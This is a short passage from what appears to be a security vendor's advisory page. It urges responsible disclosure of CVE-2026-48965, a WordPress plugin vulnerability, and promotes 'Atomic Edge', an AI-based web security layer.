Responsible disclosure
If you discover any new vulnerabilities or have further information regarding CVE-2026-48965, you can report it to the plugin developers or through official channels such as the WordPress security team to ensure responsible disclosure.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations